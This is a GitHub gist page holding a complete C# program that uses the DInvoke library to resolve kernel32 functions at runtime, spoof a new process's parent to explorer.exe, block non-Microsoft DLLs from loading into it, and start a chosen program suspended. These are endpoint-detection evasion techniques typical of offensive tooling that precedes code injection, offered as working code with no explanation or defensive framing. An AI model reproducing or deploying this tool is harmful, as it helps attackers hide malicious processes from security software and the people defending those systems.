Skip to content

Instantly share code, notes, and snippets.

@bigbrobro

bigbrobro/pidspoofDinvoke.cs

Forked from jfmaes/pidspoofDinvoke.cs
Created August 17, 2021 02:34
Show Gist options
  • Save bigbrobro/3d22b6eae52a9a5900f8a33342a09787 to your computer and use it in GitHub Desktop.
Save bigbrobro/3d22b6eae52a9a5900f8a33342a09787 to your computer and use it in GitHub Desktop.
Download ZIP
PIDSpoof-DInvoke-Dev-Nuget-NoDynamicAPIIInvoke
Raw
pidspoofDinvoke.cs
using System;
using System.Runtime.InteropServices;
using System.Diagnostics;
namespace DInvoke_PIDSpoof_DevNuget
{
class Program
{
static void Main(string[] args)
{
var startInfoEx = new STRUCTS.STARTUPINFOEX();
var processInfo = new STRUCTS.PROCESS_INFORMATION();
startInfoEx.StartupInfo.cb = (uint)Marshal.SizeOf(startInfoEx);
bool success = false;
IntPtr procaddr = IntPtr.Zero;
var lpValue = Marshal.AllocHGlobal(IntPtr.Size);
try
{
var processSecurity = new STRUCTS.SECURITY_ATTRIBUTES();
var threadSecurity = new STRUCTS.SECURITY_ATTRIBUTES();
processSecurity.nLength = Marshal.SizeOf(processSecurity);
threadSecurity.nLength = Marshal.SizeOf(threadSecurity);
var lpSize = IntPtr.Zero;
object[] initalizePTAParams = { IntPtr.Zero, 2, 0, lpSize };
procaddr = DInvoke.DynamicInvoke.Generic.GetLibraryAddress(@"kernel32.dll", @"InitializeProcThreadAttributeList", false, true);
success = (bool)DInvoke.DynamicInvoke.Generic.DynamicFunctionInvoke(procaddr, typeof(DELEGATES.InitializeProcThreadAttributeList), ref initalizePTAParams);
lpSize = (IntPtr)initalizePTAParams[3];
//alloc mem for lpsize
startInfoEx.lpAttributeList = Marshal.AllocHGlobal(lpSize);
//init2
object[] initalizePTAParams2 = { startInfoEx.lpAttributeList, 2, 0, lpSize };
procaddr = DInvoke.DynamicInvoke.Generic.GetLibraryAddress(@"kernel32.dll", @"InitializeProcThreadAttributeList", false, true);
success = (bool)DInvoke.DynamicInvoke.Generic.DynamicFunctionInvoke(procaddr, typeof(DELEGATES.InitializeProcThreadAttributeList), ref initalizePTAParams2);
lpSize = (IntPtr)initalizePTAParams2[3];
try
{
Marshal.WriteIntPtr(lpValue, new IntPtr((long)STRUCTS.BinarySignaturePolicy.BLOCK_NON_MICROSOFT_BINARIES_ALLOW_STORE));
}
catch (Exception e)
{ Console.WriteLine(e.Message); }
try
{
object[] updateProcThreadAttributeParams = { startInfoEx.lpAttributeList, (uint)0, (IntPtr)STRUCTS.ProcThreadAttribute.MITIGATION_POLICY, lpValue, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero };
procaddr = DInvoke.DynamicInvoke.Generic.GetLibraryAddress(@"kernel32.dll", @"UpdateProcThreadAttribute", false, true);
success = (bool)DInvoke.DynamicInvoke.Generic.DynamicFunctionInvoke(procaddr, typeof(DELEGATES.UpdateProcThreadAttribute), ref updateProcThreadAttributeParams);
}
catch (Exception e)
{
Console.WriteLine(e.Message);
}
var parentHandle = Process.GetProcessesByName("explorer")[0].Handle;
lpValue = Marshal.AllocHGlobal(IntPtr.Size);
Marshal.WriteIntPtr(lpValue, parentHandle);
//invoke updateprocthreadattr2
procaddr = DInvoke.DynamicInvoke.Generic.GetLibraryAddress(@"kernel32.dll", @"UpdateProcThreadAttribute", false, true);
object[] updateProcThreadAttributeParams2 = { (IntPtr)startInfoEx.lpAttributeList, (uint)0, (IntPtr)STRUCTS.ProcThreadAttribute.PARENT_PROCESS, (IntPtr)lpValue, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero };
try
{
success = (bool)DInvoke.DynamicInvoke.Generic.DynamicFunctionInvoke(procaddr, typeof(DELEGATES.UpdateProcThreadAttribute), ref updateProcThreadAttributeParams2);
}
catch (Exception e)
{ Console.WriteLine(e.Message); }
// invoke createprocessA
object[] createProcessAParams = { args[0], null, processSecurity, threadSecurity, false, STRUCTS.CreationFlags.ExtendedStartupInfoPresent | STRUCTS.CreationFlags.CreateSuspended, IntPtr.Zero, null, startInfoEx, processInfo };
try
{
procaddr = DInvoke.DynamicInvoke.Generic.GetLibraryAddress(@"kernel32.dll", @"CreateProcessA", false, true);
DInvoke.DynamicInvoke.Generic.DynamicFunctionInvoke(procaddr, typeof(DELEGATES.CreateProcess), ref createProcessAParams);
}
catch (Exception e)
{
Console.WriteLine(e.Message);
}
processInfo = (STRUCTS.PROCESS_INFORMATION)createProcessAParams[9];
}
catch (Exception e)
{
Console.Error.WriteLine(e.StackTrace);
}
finally
{
//invoke the deleteprocattr
object[] deleteProcThreadAttrListParams = { startInfoEx.lpAttributeList };
procaddr = DInvoke.DynamicInvoke.Generic.GetLibraryAddress(@"kernel32.dll", @"DeleteProcThreadAttributeList", false, true);
success = (bool)DInvoke.DynamicInvoke.Generic.DynamicFunctionInvoke(procaddr, typeof(DELEGATES.DeleteProcThreadAttributeList), ref deleteProcThreadAttrListParams);
Marshal.FreeHGlobal(startInfoEx.lpAttributeList);
Marshal.FreeHGlobal(lpValue);
Console.WriteLine("{0} started", processInfo.dwProcessId);
}
}
}
class STRUCTS
{
[StructLayout(LayoutKind.Sequential)]
public struct PROCESS_INFORMATION
{
public IntPtr hProcess;
public IntPtr hThread;
public int dwProcessId;
public int dwThreadId;
}
[StructLayout(LayoutKind.Sequential)]
public struct STARTUPINFO
{
public uint cb;
public IntPtr lpReserved;
public IntPtr lpDesktop;
public IntPtr lpTitle;
public uint dwX;
public uint dwY;
public uint dwXSize;
public uint dwYSize;
public uint dwXCountChars;
public uint dwYCountChars;
public uint dwFillAttributes;
public uint dwFlags;
public ushort wShowWindow;
public ushort cbReserved;
public IntPtr lpReserved2;
public IntPtr hStdInput;
public IntPtr hStdOutput;
public IntPtr hStdErr;
}
[StructLayout(LayoutKind.Sequential)]
public struct STARTUPINFOEX
{
public STARTUPINFO StartupInfo;
public IntPtr lpAttributeList;
}
[StructLayout(LayoutKind.Sequential)]
public struct SECURITY_ATTRIBUTES
{
public int nLength;
public IntPtr lpSecurityDescriptor;
public int bInheritHandle;
}
[Flags]
public enum ProcThreadAttribute : int
{
MITIGATION_POLICY = 0x20007,
PARENT_PROCESS = 0x00020000
}
[Flags]
public enum BinarySignaturePolicy : ulong
{
BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON = 0x100000000000,
BLOCK_NON_MICROSOFT_BINARIES_ALLOW_STORE = 0x300000000000
}
[Flags]
public enum CreationFlags : uint
{
CreateSuspended = 0x00000004,
DetachedProcess = 0x00000008,
CreateNoWindow = 0x08000000,
ExtendedStartupInfoPresent = 0x00080000
}
}
class DELEGATES
{
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
public delegate IntPtr GetProcAddress(IntPtr hModule, String lpProcName);
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
public delegate IntPtr LoadLibrary(string dllToLoad);
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
public delegate bool InitializeProcThreadAttributeList(IntPtr lpAttributeList, int dwAttributeCount, int dwFlags, ref IntPtr lpSize);
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
public delegate bool UpdateProcThreadAttribute(IntPtr lpAttributeList, uint dwFlags, IntPtr Attribute, IntPtr lpValue, IntPtr cbSize, IntPtr lpPreviousValue, IntPtr lpReturnSize);
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
public delegate bool CreateProcess(string lpApplicationName, string lpCommandLine, ref STRUCTS.SECURITY_ATTRIBUTES lpProcessAttributes, ref STRUCTS.SECURITY_ATTRIBUTES lpThreadAttributes, bool bInheritHandles, STRUCTS.CreationFlags dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref STRUCTS.STARTUPINFOEX lpStartupInfo, out STRUCTS.PROCESS_INFORMATION lpProcessInformation);
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
public delegate bool DeleteProcThreadAttributeList(IntPtr lpAttributeList);
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment